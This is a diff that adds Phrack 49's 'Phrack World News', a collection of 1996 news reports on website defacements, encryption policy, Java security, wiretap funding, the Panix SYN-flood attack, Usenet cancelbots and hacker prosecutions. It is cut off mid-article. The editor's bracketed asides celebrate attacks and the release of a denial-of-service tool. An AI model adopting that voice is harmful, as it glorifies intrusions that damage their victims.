+      	if (!host)  {
+#ifndef RESOLVE_QUIET
+	   fprintf(stderr,"unable to resolve host \"%s\" -- ",inet_ntoa(addr));
+	   perror("");
+#endif
+
+	   return -1;
+	}
+
+
+	strcpy(name,host->h_name);
+	
+        return 0;
+     }
+	
+
+unsigned long addr_to_ulong(struct sockaddr_in *addr)
+     {
+	return addr->sin_addr.s_addr;
+     }
+
diff --git a/phrack49/16.txt b/phrack49/16.txt
new file mode 100644
index 0000000..2613296
--- /dev/null
+++ b/phrack49/16.txt
@@ -0,0 +1,2271 @@
+                              .oO Phrack 49 Oo.
+
+                          Volume Seven, Issue Forty-Nine
+
+                                    16 of 16
+
+
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+              PWN                                             PWN
+              PWN              Phrack World News              PWN
+              PWN                                             PWN
+              PWN                  Issue 49                   PWN
+              PWN                                             PWN
+              PWN             Compiled by DisordeR            PWN
+              PWN                                             PWN
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+Phrack World News #49 -- Index
+
+01. CIA attacked, pulls plug on Internet site
+02. Letter From Senator Patrick Leahy (D-VT) on Encryption
+03. Java Black Widows - Sun Declares War
+04. Jacking in from the "Smoked Filled Room" Port
+05. Panix Attack
+06. Massive Usenet Cancels
+07. Mitnick Faces 25 More Federal Counts of Computer Hacking
+08. Hacker is freed but he's banned from computers
+09. Computer Hacker Severely Beaten after Criticizing Prison Conditions
+    Target of Campaign by U.S. Secret Service
+10. Bernie S. Released!
+11. <The Squidge Busted>
+12. School Hires Student to Hack Into Computers
+13. Paranoia and Brit Hackers Fuel Infowar Craze in Spy Agencies
+14. Hackers Find Cheap Scotland Yard Phone Connection
+15. U.S. Official Warns OF "Electronic Pearl Harbor"
+16. Suit Challenges State's Restraint of the Internet Via AP
+17. U.S. Government Plans Computer Emergency Response Team
+18. Hackers $50K challenge to break Net security system
+19. Criminal cult begins PGP crack attempt
+20. Hackers Bombard Internet
+21. Crypto Mission Creep
+22. Hacker posts nudes on court's Web pages
+23. Hacking Into Piracy
+24. Revealing Intel's Secrets
+25. Internet Boom Puts Home PCs At Risk Of Hackers
+26. Computer hacker Mitnick pleads innocent
+27. Hackers Destroy Evidence of Gulf War Chemical/Biological Weapons
+28. Criminals Slip Through The Net
+
+
+[=-------------------------------------------------------------------------=]
+
+title: CIA attacked, pulls plug on Internet site
+author: unknown
+source: Reuter
+
+WASHINGTON (Reuter) - The Central Intelligence Agency, that bastion of
+spy technology and computer wizardry, pulled the plug on its World
+Wide Web site on the Internet Thursday after a hacker broke in and
+replaced it with a crude parody.
+
+CIA officials said their vandalized homepage -- altered to read
+"Welcome to the Central Stupidity Agency" -- was in no way linked to
+any mainframe computers containing classified national security
+information.
+
+[* Excuse me for a minute while my erection goes down. *]
+
+The site was tampered with Wednesday evening and the CIA closed it
+Thursday morning while a task force looked into the security breach,
+CIA spokeswoman Jane Heishman said. Part of the hacker's text read
+"Stop Lying."
+
+"It's definitely a hacker" who pierced the system's security, she
+said. "The agency has formed a task force to look into what happend
+and how to prevent it."
+
+[* No shit?! It was a hacker that did that? *]
+
+The CIA web site (http://www.odci.gov/cia) showcases unclassified
+information including spy agency press releases, officials' speeches,
+historical rundowns and the CIA's World Fact Book, a standard
+reference work.
+
+The cyber-attack matched one that forced the Justice Department to
+close its Web site last month after hackers inserted a swastika and
+picture of Adolph Hitler.  The penetration of the CIA homepage
+highlighted the vulnerability of Internet sites designed to attract
+the public and drove home the need for multiple layers of security.
+
+"You want people to visit, you want them to interact, but you don't
+want them to leave anything behind," said Jon Englund of the
+Information Technology Association of America, a trade group of
+leading software and telecommunications firms.
+
+[=-------------------------------------------------------------------------=]
+
+From: Senator_Leahy@LEAHY.SENATE.GOV
+Date: Thu, 02 May 96 12:04:07 EST
+
+-----BEGIN PGP SIGNED MESSAGE-----
+
+     LETTER FROM SENATOR PATRICK LEAHY (D-VT) ON ENCRYPTION
+
+May 2, 1996
+
+Dear Friends:
+
+Today, a bipartisan group of Senators has joined me in supporting
+legislation to encourage the development and use of strong,
+privacy-enhancing technologies for the Internet by rolling back
+the out-dated restrictions on the export of strong cryptography.
+
+In an effort to demonstrate one of the more practical uses of
+encryption technology (and so that you all know this message
+actually came from me), I have signed this message using a
+digital signature generated by the popular encryption program
+PGP.  I am proud to be the first member of Congress to utilize
+encryption and digital signatures to post a message to the
+Internet.
+
+[* The first?! We're doomed!! *]
+
+As a fellow Internet user, I care deeply about protecting
+individual privacy and encouraging the development of the Net as
+a secure and trusted communications medium.  I do not need to
+tell you that current export restrictions only allow American
+companies to export primarily weak encryption technology.  The
+current strength of encryption the U.S. government will allow out
+of the country is so weak that, according to a January 1996 study
+conducted by world-renowned cryptographers, a pedestrian hacker
+can crack the codes in a matter of hours!  A foreign intelligence
+agency can crack the current 40-bit codes in seconds.
+
+[* That should read "As a fellow Internet user ..who doesn't read
+   his own mail... *]
+
+Perhaps more importantly, the increasing use of the Internet and
+similar interactive communications technologies by Americans to
+obtain critical medical services, to conduct business, to be
+entertained and communicate with their friends, raises special
+concerns about the privacy and confidentiality of those
+communications.  I have long been concerned about these issues,
+and have worked over the past decade to protect privacy and
+security for our wire and electronic communications.  Encryption
+technology provides an effective way to ensure that only the
+people we choose can read our communications.
+
+I have read horror stories sent to me over the Internet about how
+human rights groups in the Balkans have had their computers
+confiscated during raids by security police seeking to find out
+the identities of people who have complained about abuses.
+Thanks to PGP, the encrypted files were undecipherable by the
+police and the names of the people who entrusted their lives to
+the human rights groups were safe.
+
+The new bill, called the "Promotion of Commerce On-Line in the
+Digital Era (PRO-CODE) Act of 1996," would:
+
+     o    bar any government-mandated use of any particular
+     encryption system, including key escrow systems and affirm
+     the right of American citizens to use whatever form of
+     encryption they choose domestically;
+
+[* Thank you for permission to do that.. even though it is legal already *]
+
+     o    loosen export restrictions on encryption products so
+     that American companies are able to export any generally
+     available or mass market encryption products without
+     obtaining government approval; and
+
+[* Loosen? Why not abolish? *]
+
+     o    limit the authority of the federal government to set
+     standards for encryption products used by businesses and
+     individuals, particularly standards which result in products
+     with limited key lengths and key escrow.
+
+This is the second encryption bill I have introduced with Senator
+Burns and other congressional colleagues this year. Both bills
+call for an overhaul of this country's export restrictions on
+encryption, and, if enacted, would quickly result in the
+widespread availability of strong, privacy protecting
+technologies. Both bills also prohibit a government-mandated key
+escrow encryption system.  While PRO-CODE would limit the
+authority of the Commerce Department to set encryption standards
+for use by private individuals and businesses, the first bill we
+introduced, called the "Encrypted Communications Privacy Act",
+S.1587, would set up stringent procedures for law enforcement to
+follow to obtain decoding keys or decryption assistance to read
+the plaintext of encrypted communications obtained under court
+order or other lawful process.
+
+It is clear that the current policy towards encryption exports is
+hopelessly outdated, and fails to account for the real needs of
+individuals and businesses in the global marketplace.  Encryption
+expert Matt Blaze, in a recent letter to me, noted that current
+U.S. regulations governing the use and export of encryption are
+having a "deleterious effect ... on our country's ability to
+develop a reliable and trustworthy information infrastructure."
+The time is right for Congress to take steps to put our national
+encryption policy on the right course.
+
+I am looking forward to hearing from you on this important issue.
+Throughout the course of the recent debate on the Communications
+Decency Act, the input from Internet users was very valuable to
+me and some of my Senate colleagues.
+
+You can find out more about the issue at my World Wide Web home
+page (http://www.leahy.senate.gov/) and at the Encryption Policy
+Resource Page (http://www.crypto.com/). Over the coming months, I
+look forward to the help of the Net community in convincing other
+Members of Congress and the Administration of the need to reform
+our nation's cryptography policy.
+
+Sincerely,
+
+Patrick Leahy
+United States Senator
+
+[=-------------------------------------------------------------------------=]
+
+title: JAVA BLACK WIDOWS - SUN DECLARES WAR
+author: unknown
+from: staff@hpp.com
+
+
+Sun Microsystems' has declared war on Black Widow Java
+applets on the Web. This is the message from Sun in response
+to an extensive Online Business Consultant (OBC/May 96)
+investigation into Java security.
+
+OBC's investigation and report was prompted after renowned
+academics, scientists and hackers announced Java applets
+downloaded from the WWW presented grave security risks for
+users. Java Black Widow applets are hostile, malicious traps set
+by cyberthugs out to snare surfing prey, using Java as their technology.
+OBC received a deluge of letters asking for facts after OBC
+announced a group of scientists from Princeton University, Drew
+Dean, Edward Felten and Dan Wallach, published a paper declaring
+"The Java system in its current form cannot easily be made secure."
+The paper can be retrieved at
+http://www.cs.princeton.edu/sip/pub/secure96.html.
+
+Further probing by OBC found that innocent surfers on the Web who
+download Java applets into Netscape's Navigator and Sun's
+HotJava browser, risk having "hostile" applets interfere with their
+computers (consuming RAM and CPU cycles). It was also discovered
+applets could connect to a third party on the Internet and, without the
+PC owner's knowledge, upload sensitive information from the user's
+computer. Even the most sophisticated firewalls can be penetrated . . .
+"because the attack is launched from behind the firewall," said the
+Princeton scientists.
+
+One reader said, "I had no idea that it was possible to stumble on
+Web sites that could launch an attack on a browser."  Another said,
+"If this is allowed to get out of hand it will drive people away from the
+Web. Sun must allay fears."
+
+[* Faster connections if people are driven from the web.. hmm... :) *]
+
+The response to the Home Page Press hostile applet survey led to the
+analogy of Black Widow; that the Web was a dangerous place where
+"black widows" lurked to snare innocent surfers. As a result the
+Princeton group and OBC recommended users should "switch off"
+Java support in their Netscape Navigator browsers. OBC felt that Sun
+and Netscape had still to come clean on the security issues. But
+according to Netscape's Product Manager, Platform, Steve Thomas,
+"Netscape wishes to make it clear that all known security problems with
+the Navigator Java and JavaScript environment are fixed in Navigator
+version 2.02."
+
+However, to date, Netscape has not answered OBC's direct questions
+regarding a patch for its earlier versions of Navigator that supported
+Java . . . the equivalent of a product recall in the 3D world. Netscape
+admits that flaws in its browsers from version 2.00 upwards were
+related to the Java security problems, but these browsers are still in use
+and can be bought from stores such as CompUSA and Cosco. A floor
+manager at CompUSA, who asked not to be named, said "its news to
+him that we are selling defective software. The Navigator walks off our
+floor at $34 a pop."
+
+OBC advised Netscape the defective software was still selling at
+software outlets around the world and asked Netscape what action was
+going to be taken in this regard. Netscape has come under fire recently
+for its policy of not releasing patches to software defects; but rather
+forcing users to download new versions. Users report this task to be a
+huge waste of time and resources because each download consists of
+several Mbytes. As such defective Navigators don't get patched.
+
+OBC also interviewed Sun's JavaSoft security guru, Ms. Marianne Mueller,
+who said "we are taking security very seriously and working on it very
+hard." Mueller said the tenet that Java had to be re-written from scratch or
+scrapped "is an oversimplification of the challenge of running executable
+content safely on the web. Security is hard and subtle, and trying to build
+a secure "sandbox" [paradigm] for running untrusted downloaded applets
+on the web is hard."
+
+Ms. Mueller says Sun, together with their JavaSoft (Sun's Java division)
+partners, have proposed a "sandbox model" for security in which "we
+define a set of policies that restrict what applets can and cannot do---these
+are the boundaries of the sandbox. We implement boundary checks---when
+an applet tries to cross the boundary, we check whether or not it's allowed
+to. If it's allowed to, then the applet is allowed on its way. If not, the
+system throws a security exception.
+
+"The 'deciding whether or not to allow the boundary to be crossed' is the
+research area that I believe the Princeton people are working on," said
+Mueller. "One way to allow applets additional flexibility is if the applet
+is signed (for example, has a digital signature so that the identity of the
+applet's distributor can be verified via a Certificate Authority) then allow
+the applet more flexibility.
+
+ "There are two approaches: One approach is to let the signed applet
+do anything. A second approach is to do something more complex and
+more subtle, and only allow the applet particular specified capabilities.
+Expressing and granting capabilities can be done in a variety of ways.
+
+"Denial of service is traditionally considered one of the hardest security
+problems, from a practical point of view. As [Java's creator] James
+Gosling says, it's hard to tell the difference between an MPEG
+decompressor and a hostile applet that consumes too many resources!
+But recognizing the difficulty of the problem is not the same as 'passing
+the buck.' We are working on ways to better monitor and control the
+use (or abuse) of resources by Java classes. We could try to enforce
+some resource limits, for example. These are things we are investigating.
+
+"In addition, we could put mechanisms in place so that user interface
+people (like people who do Web browsers) could add 'applet monitors'
+so that browser users could at least see what is running in their browser,
+and kill off stray applets. This kind of user interface friendliness (letting
+a user kill of an applet) is only useful if the applet hasn't already grabbed
+all the resources, of course."
+
+The experts don't believe that the problem of black widows and hostile
+applets is going to go away in a hurry. In fact it may get worse. The
+hackers believe that when Microsoft releases Internet Explorer 3.00 with
+support for Java, Visual Basic scripting and the added power of its
+ActiveX technology, the security problem will become worse.
+
+"There is opportunity for abuse, and it will become an enormous
+problem," said Stephen Cobb, Director of Special Projects for the
+National Computer Security Association (NCSA). "For example, OLE
+technology from Microsoft [ActiveX] has even deeper access to a
+computer than Java does."
+
+JavaSoft's security guru Mueller agreed on the abuse issue: "It's going
+to be a process of education for people to understand the difference
+between a rude applet, and a serious security bug, and a theoretical
+security bug, and an inconsequential security-related bug. In the case of
+hostile applets, people will learn about nasty/rude applet pages, and
+those pages won't be visited. I understand that new users of the Web
+often feel they don't know where they're going when they point and click,
+but people do get a good feel for how it works, pretty quickly, and I
+actually think most users of the Web can deal with the knowledge that
+not every page on the web is necessarily one they'd want to visit.
+Security on the web in some sense isn't all that different from security
+in ordinary life. At some level, common sense does come into play.
+
+"Many people feel that Java is a good tool for building more secure
+applications. I like to say that Java raises the bar for security on the
+Internet. We're trying to do something that is not necessarily easy, but
+that doesn't mean it isn't worth trying to do. In fact it may be worth
+trying to do because it isn't easy.  People are interested in seeing the
+software industry evolve towards more robust software---that's the
+feedback I get from folks on the Net."
+
+# # #
+
+The report above may be reprinted with credit provided as follows:
+
+Home Page Press, Inc.,  http://www.hpp.com  and Online Business ConsultantOE
+Please refer to the HPP Web site for additional information about Java and
+OBC.
+
+[=-------------------------------------------------------------------------=]
+
+title: Jacking in from the "Smoked Filled Room" Port
+author: "Brock N. Meeks" <brock@well.com>
+source: CyberWire Dispatch // September // Copyright (c) 1996 //
+
+Washington, DC -- Federal provisions funding the digital telephony bill
+and roving wiretaps, surgically removed earlier this year from an
+anti-terrorism bill, have quietly been wedged into a $600 billion
+omnibus spending bill.
+
+The bill creates a Justice Department "telecommunications carrier
+compliance fund" to pay for the provisions called for in the digital
+telephony bill, formally known as the Communications Assistance in Law
+Enforcement Act (CALEA).  In reality, this is a slush fund.
+
+Congress originally budgeted $500 million for CALEA, far short of the
+billions actually needed to build in instant wiretap capabilities into
+America's telephone, cable, cellular and PCS networks.  This bill now
+approves a slush fund of pooled dollars from the budgets of "any agency"
+with "law enforcement, national security or intelligence
+responsibilities."  That means the FBI, CIA, NSA and DEA, among others,
+will now have a vested interest in how the majority of your
+communications are tapped.
+
+The spending bill also provides for "multipoint wiretaps."  This is the
+tricked up code phase for what amounts to roving wiretaps.  Where the
+FBI can only tap one phone at a time in conjunction with an
+investigation, it now wants the ability to "follow" a conversation from
+phone to phone; meaning that if your neighbor is under investigation and
+happens to use your phone for some reason, your phone gets tapped.    It
+also means that the FBI can tap public pay phones... think about that
+next time you call 1-800-COLLECT.
+
+In addition, all the public and congressional accountability provisions
+for how CALEA money was spent, which were in the original House version
+(H.R. 3814), got torpedoed in the Senate Appropriations Committee.
+
+Provisions stripped out by the Senate:
+
+-- GONE: Money isn't to be spent unless an implementation plan is sent
+to each member of the Judiciary Committee and Appropriations committees.
+
+-- GONE:  Requirement that the FBI provide public details of how its new
+wiretap plan exceeds or differs from current capabilities.
+
+-- GONE:  Report on the "actual and maximum number of simultaneous
+surveillance/intercepts" the FBI expects.   The FBI ran into a fire storm
+earlier this year when it botched its long overdue report that said it
+wanted the capability to tap one out of every 100 phones
+*simultaneously*.   Now, thanks to this funding bill, rather than having
+to defend that request, it doesn't have to say shit.
+
+-- GONE:  Complete estimate of the full costs of deploying and
+developing the digital wiretapping plan.
+
+-- GONE:  An annual report to Congress "specifically detailing" how all
+taxpayer money -- YOUR money -- is spent to carry out these new wiretap
+provisions.
+
+"No matter what side you come down on this (digital wiretapping) issue,
+the stakes for democracy are that we need to have public accountability,"
+said Jerry Berman, executive director of the Center for Democracy and
+Technology.
+
+Although it appeared that no one in congress had the balls to take on
+the issue, one stalwart has stepped forward, Rep. Bob Barr (R-Ga.).  He
+has succeeded in getting some of the accountability provisions back into
+the bill, according to a Barr staffer.  But the fight couldn't have been
+an easy one.   The FBI has worked congress relentlessly in an effort to
+skirt the original reporting and implementation requirements as outlined
+in CALEA.  Further, Barr isn't exactly on the FBI's Christmas card list.
+Last year it was primarily Barr who scotched the funding for CALEA
+during the 104th Congress' first session.
+
+But Barr has won again.  He has, with backing from the Senate, succeeded
+in *putting back* the requirement that the FBI must justify all CALEA
+expenditures to the Judiciary Committee.   Further, the implementation
+plan, "though somewhat modified" will "still have some punch," Barr's
+staffer assured me.  That includes making the FBI report on its
+expected capacities and capabilities for digital wiretapping. In other
+words, the FBI won't be able to "cook the books" on the wiretap figures
+in secret.  Barr also was successful in making the Justice Department
+submit an annual report detailing its CALEA spending to Congress.
+
+However, the funding for digital wiretaps remains.  Stuffing the funding
+measures into a huge omnibus spending bill almost certainly assures its
+passage. Congress is twitchy now, anxious to leave.  They are chomping
+at the bit, sensing the end of the 104th Congress' tortured run as the
+legislative calender is due to run out sometime early next week.  Then
+they will all literally race from Capitol Hill at the final gavel,
+heading for the parking lot, jumping in their cars like stock car
+drivers as they make a made dash for National Airport to return to their
+home districts in an effort to campaign for another term in the loopy
+world of national politics.
+
+Congress is "going to try to sneak this (spending bill) through the back
+door in the middle of the night," says Leslie Hagan, legislative
+director for the National Association of Criminal Defense Lawyers.  She
+calls this a "worst case scenario" that is "particularly dangerous"
+because the "deliberative legislative process is short-ciricutied."
+
+Such matters as wiretapping deserve to be aired in the full sunlight of
+congressional hearings, not stuffed into an 11th hour spending bill.
+This is legislative cowardice.  Sadly, it will most likely succeed.
+
+And through this all, the Net sits mute.
+
+Unlike a few months ago, on the shameful day the Net cried "wolf" over
+these same provisions, mindlessly flooding congressional switchboards
+and any Email box within keyboard reach, despite the fact that the
+funding provisions had been already been stripped from the
+anti-terrorism bill, there has been no hue-and-cry about these most
+recent moves.
+
+Yes, some groups, such as the ACLU, EPIC and the Center for Democracy
+and Technology have been working the congressional back channels,
+buzzing around the frenzied legislators like crazed gnats.
+
+But why haven't we heard about all this before now?  Why has  this bill
+come down to the wire without the now expected flurry of "alerts"
+"bulletins" and other assorted red-flag waving by our esteemed Net
+guardians?  Barr's had his ass hanging in the wind, fighting FBI
+Director Louis "Teflon" Freeh;  he could have used some political cover
+from the cyberspace community.  Yet, if he'd gone to that digital well,
+he'd have found only the echo of his own voice.
+
+And while the efforts of Rep. Barr are encouraging, it's anything from a
+done deal.  "As long as the door is cracked... there is room for
+mischief," said Barr's staffer.   Meaning, until the bill is reported
+and voted on, some snapperhead congressman could fuck up the process yet
+again.
+
+We all caught a bit of a reprieve here, but I wouldn't sleep well.  This
+community still has a lot to learn about the Washington boneyard.
+Personally, I'm a little tired of getting beat up at every turn.  Muscle
+up, folks, the fight doesn't get any easier.
+
+Meeks out...
+
+Declan McCullagh <declan@well.com> contributed to this report.
+
+[=-------------------------------------------------------------------------=]
+
+title: Panix Attack
+author: Joshua Quittner
+source: Time Magazine - September 30, 1996 Volume 148, No. 16
+   
+It was Friday night, and Alexis Rosen was about to leave work when one
+of his computers sent him a piece of E-mail. If this had been the
+movies, the message would have been presaged by something
+dramatic--the woo-ga sound of a submarine diving into combat, say. But
+of course it wasn't. This was a line of dry text automatically
+generated by one of the machines that guard his network. It said
+simply, "The mail servers are down." The alert told Rosen that his
+6,000 clients were now unable to receive E-mail.
+
+Rosen, 30, is a cool customer, not the type to go into cardiac arrest
+when his mail server crashes. He is the co-founder of Panix, the
+oldest and best-known Internet service provider in Manhattan. Years
+before the Net became a cereal-box buzz word, Rosen would let people
+connect to Panix free, or for only a few dollars a month, just
+because--well, because that was the culture of the time. Rosen has
+handled plenty of mail outages, so on this occasion he simply rolled
+up his sleeves and set to work, fingers clacking out a flamenco on the
+keyboard, looking for the cause of the glitch. What he uncovered sent
+a chill down his spine--and has rippled across the Net ever since,
+like a rumor of doom. Someone, or something, was sending at the rate
+of 210 a second the one kind of message his computer was obliged to
+answer. As long as the siege continued--and it went on for
+weeks--Rosen had to work day and night to keep from being overwhelmed
+by a cascade of incoming garbage.
+
+It was the dread "syn flood," a relatively simple but utterly
+effective means for shutting down an Internet service provider--or,
+for that matter, anyone else on the Net. After Panix went public with
+its story two weeks ago, dozens of online services and companies
+acknowledged being hit by similar "denial of service" attacks. As of
+late last week, seven companies were still under furious assault.
+
+None of the victims have anything in common, leading investigators to
+suspect that the attacks may stem from the same source: a pair of
+how-to articles that appeared two months ago in 2600 and Phrack, two
+journals that cater to neophyte hackers. Phrack's article was written
+by a 23-year-old editor known as daemon9. He also crafted the code for
+an easy-to-run, menu-driven, syn-flood program, suitable for use by
+any "kewl dewd" with access to the Internet. "Someone had to do it,"
+wrote daemon9.
+
+[* WooWoo! Go Route! *]
+
+That gets to the core of what may be the Net's biggest problem these
+days: too many powerful software tools in the hands of people who
+aren't smart enough to build their own--or to use them wisely. Real
+hackers may be clever and prankish, but their first rule is to do no
+serious harm. Whoever is clobbering independent operators like Panix
+has as much to do with hacking as celebrity stalkers have to do with
+cinematography. Another of the victims was the Voters
+Telecommunications Watch, a nonprofit group that promotes free speech
+online. "Going after them was like going after the little old lady who
+helps people in the neighborhood and bashing her with a lead pipe,"
+says Rosen.
+
+[* Gee. Is that to say that if you can't write your own operating system
+   that you shouldn't have it or that it is a big problem? If so, poor
+   Microsoft... *]
+
+Rosen was eventually able to repulse the attack; now he'd like to
+confront his attacker. Since some of these Netwits don't seem to know
+enough to wipe off their digital fingerprints, he may get his wish.
+
+[* Wow, they did it for two weeks without getting caught. Two weeks of
+   24/7 abuse toward this ISP, and now he thinks he can track them down? *]
+
+[=-------------------------------------------------------------------------=]
+
+title: none
+author: Rory J. O'Connor
+source: Knight-Ridder Newspapers
+
+WASHINGTON -- Vandals swept through the Internet last weekend, wiping
+clean dozens of public bulletin boards used by groups of Jews, Muslims,
+feminists and homosexuals, among others.
+
+In one of the most widespread attacks on the international computer
+network, the programs automatically erased copies of more than 27,000
+messages from thousands of servers, before operators stopped the
+damage.
+
+The identity of those responsible for launching the apparent hate
+attacks -- some of the programs were titled "fagcancel" and "kikecancel" 
+-- is unknown.
+
+The incident further illustrates the shaky security foundation of the
+Internet, which has mushroomed from academic research tool to
+international communications medium in just three years.
+
+And it raised the ire of many Internet users furious at the ease with
+which a user can erase someone else's words from worldwide discussion
+groups, known as Usenet newsgroups, in a matter of hours.
+
+"There's nothing you can do as an individual user to prevent someone
+from canceling your message," said John Gilmore, a computer security
+expert in San Francisco. "We need something added to Usenet's software
+that would only allow a cancellation from the originator."
+
+[* Which can then be forged just like fakemail... *]
+
+The incident follows closely three other well-publicized Internet
+attacks.
+
+In two cases, hackers altered the World Wide Web home pages of the
+Justice Department and the CIA, apparently as political protests. In
+the third, a hacker overloaded the computers of an Internet service
+provider called Panix with hordes of phony requests for a connection,
+thus denying use of the service to legitimate users.
+
+The latest attacks -- called cancelbots -- were launched sometime over
+the weekend from a variety of Internet service providers, including
+UUNet Technologies in Fairfax, Va., and Netcom Inc. in San Jose,
+Calif. One attack was launched from a tiny provider in Tulsa, Okla.,
+called Cottage Software, according to its owner, William Brunton.
+
+"The offending user has been terminated and the information has been
+turned over to the proper (federal) authorities," Brunton said in a
+telephone interview Wednesday. "It's now in their hands."
+
+Legal experts said it's unclear if the attacks constitute a crime
+under federal laws such as the Computer Fraud and Abuse Act.
+
+"It's really a difficult issue," said David Sobel, legal counsel of
+the Electronic Privacy Information Center in Washington. "Can you
+assign value to a newsgroup posting? Because most of the computer
+crime statutes assume you're ripping off something of value."
+
+[* Hello? Several statutes don't assume that at all. You can be
+   charged with HAVING information and not using it. *]
+
+A spokesman for the FBI in Washington said he was unaware of any
+federal investigation of the incident, although it is the agency's
+policy not to comment on investigations.
+
+While some of the deleted messages have been restored on certain
+servers, where operators have retrieved them from backup copies of
+their disks, users of other servers where the messages haven't been
+restored will never be able to read them.
+
+The fact that a user can stamp out the words of someone else is an
+artifact of the original design of the Internet, begun as a Department
+of Defense project in 1969.
+
+The Internet consists of tens of thousands of computers, called
+servers, that act as repositories for public messages, private
+electronic mail and World Wide Web home pages. Servers throughout the
+world are interconnected through telephone lines so they can exchange
+information and route messages to the individual users, or clients, of
+a given server.
+
+Each server stores a copy of the constantly changing contents of
+newsgroups, which function as giant electronic bulletin boards
+dedicated to particular subjects. There are thousands of them,
+covering everything from particle physics to soap operas.
+
+Any Internet user is free to post a contribution to nearly any
+newsgroup, and the posting is rapidly copied from one server to
+another, so the contents of a newsgroup are identical on every server.
+
+Almost the only form of control over postings, including their
+content, is voluntary adherence to informal behavior rules known as
+"netiquette."
+
+The idea of cancelbots originated when the Internet and its newsgroups
+were almost exclusively the domain of university and government
+scientists and researchers. Their purpose was to allow individuals to
+rescind messages they later discovered to contain an error. The action
+took the form of an automatic program, itself in the form of a
+message, because it would be impossible for an individual to find and
+delete every copy of the posting on every Internet server.
+
+But the Usenet software running on servers doesn't verify that the
+cancel message actually comes from the person who created the original
+posting. All a malicious user need do is replace their actual e-mail
+address with that of someone else to fool Usenet into deleting a
+message. That counterfeiting is as simple as changing an option in the
+browser software most people use to connect to the Internet.
+
+"It's pretty easy. There's no authentication in the Usenet. So anybody
+can pretend to be anybody else," Gilmore said.
+
+It takes only slightly more sophistication to create a program that
+searches newsgroups for certain keywords, and then issues a cancelbot
+for any message that contains them. That is how the weekend attack
+took place.
+
+The use of counterfeit cancelbots is not new. The Church of
+Scientology, embroiled in a legal dispute with former members, last
+year launched cancelbots against the newsgroup postings of the
+members. Attorneys for the church claimed the postings violated
+copyright laws, because they contained the text of Scientology
+teachings normally available only to longtime members who have paid
+thousands of dollars.
+
+Net users have also turned false cancelbots against those who violate
+a basic rule of netiquette by "spamming" newsgroups -- that is,
+posting a message to hundreds or even thousands of newsgroups, usually
+commercial in nature and unrelated to the newsgroup topic.
+
+"This technology has been used for both good and evil," Gilmore said.
+
+But an individual launching a wholesale cancelbot attack on postings
+because of content is considered a serious violation of netiquette --
+although one about which there is little recourse at the moment.
+
+"For everybody who takes the trouble and time to participate on the
+Internet in some way, I think it is not acceptable for somebody else
+to undo those efforts," Sobel said. "But what are the alternatives?
+Not to pursue this means of communications? Unintended uses and
+malicious uses seem to be inevitable."
+
+What's needed, some say, is a fundamental change in the Internet that
+forces individual users to "sign" their postings in such a way that
+everyone has a unique identity that can't be forged.
+
+[* And how about for the technically challenged who can't figure
+   out the point-and-drool America Online software? *]
+
+"The fatal flaw is that newsgroups were set up at a time when
+everybody knew everybody using the system, and you could weed out
+anybody who did this," Brunton said. "This points out that flaw in the
+system, and that there are unreasonable people out there who will
+exploit it."
+
+[=-------------------------------------------------------------------------=]
+
+title: Mitnick Faces 25 More Federal Counts of Computer Hacking
+source: nando.net - Los Angeles Daily News
+   
+   LOS ANGELES (Sep 27, 1996 02:06 a.m. EDT) -- A computer hacker who
+   used his digital prowess to outrun FBI agents for three years has been
+   indicted on charges that he stole millions of dollars in software
+   through the Internet.
+   
+   The 25-count federal indictment against Kevin Mitnick is the biggest
+   development in the sensational case since the self-taught computer
+   whiz was arrested in February 1995 in North Carolina.
+   
+   The 33-year-old son of a waitress from suburban Los Angeles has been
+   held in custody in Los Angeles ever since.
+   
+   With Thursday's indictment, federal prosecutors made good on their vow
+   to hold Mitnick accountable for what they say was a string of hacking
+   crimes that pushed him to the top of the FBI's most-wanted list.
+   
+   "These are incredibly substantial charges. They involve conducts
+   spanning two and a half years. They involve a systematic scheme to
+   steal proprietary software from a range of victims," Assistant U.S.
+   Attorney David Schindler said in an interview.
+   
+   Mitnick's longtime friend, Lewis De Payne, 36, also was indicted
+   Thursday on charges that he helped steal the software between June
+   1992 and February 1995 -- while Mitnick was on the run from the FBI.
+   
+   "I would say it is an absurd fiction," said De Payne's attorney,
+   Richard Sherman. "I don't think the government is going to be able to
+   prove its case."
+   
+   De Payne will surrender today to authorities in Los Angeles, Sherman
+   said.
+   
+   Friends and relatives of Mitnick have defended his hacking, saying he
+   did it for the intellectual challenge and to pull pranks -- but never
+   for profit.
+   
+   Los Angeles' top federal prosecutor sees it differently.
+   
+   "Computer and Internet crime represents a major threat, with
+   sophisticated criminals able to wreak havoc around the world," U.S.
+   Attorney Nora M. Manella said in a written statement.
+   
+   The indictment charges Mitnick and De Payne with having impersonated
+   officials from companies and using "hacking" programs to enter company
+   computers. Schindler said the software involved the operation of
+   cellular telephones and computer operating systems.
+   
+   Their alleged victims include the University of Southern California,
+   Novell, Sun Microsystems and Motorola, Schindler said.
+
+[=-------------------------------------------------------------------------=]
+
+title: Hacker is freed but he's banned from computers
+author: Brandon Bailey (Mercury News Staff Writer)
+
+Convicted hacker Kevin Poulsen is out of prison after five years, but
+he still can't touch a computer.
+
+Facing a court order to pay more than $57,000 in restitution for
+rigging a series of radio station call-in contests, Poulsen has
+complained that authorities won't let him use his only marketable
+skill -- programming.
+
+Instead, Poulsen said, he's doomed to work for minimum wage at a
+low-tech job for the next three years. Since his June release from
+prison -- after serving more time behind bars than any other
+U.S. hacker -- the only work he's found is canvassing door to door for
+a liberal political action group.
+
+It's a big change for the 30-year-old Poulsen, once among the most
+notorious hackers on the West Coast. A former employee at SRI
+International in Menlo Park, he was featured on television's
+"America's Most Wanted" while living underground in Los Angeles as a
+federal fugitive from 1989 to 1991.
+
+Before authorities caught him, Poulsen burglarized telephone company
+offices, electronically snooped through records of law enforcement
+wiretaps and jammed radio station phone lines in a scheme to win cash,
+sports cars and a trip to Hawaii.
+
+Poulsen now lives with his sister in the Los Angeles area, where he
+grew up in the 1970s and '80s. But he must remain under official
+supervision for three more years. And it galls him that authorities
+won't trust him with a keyboard or a mouse.
+
+U.S. District Judge Manuel Real has forbidden Poulsen to have any
+access to a computer without his probation officer's approval.
+
+That's a crippling restriction in a society so reliant on computer
+technology, Poulsen complained in a telephone interview after a
+hearing last week in which the judge denied Poulsen's request to
+modify his terms of probation.
+
+To comply with those rules, Poulsen said, his parents had to put their
+home computer in storage when he stayed with them. He can't use an
+electronic card catalog at the public library. And he relies on
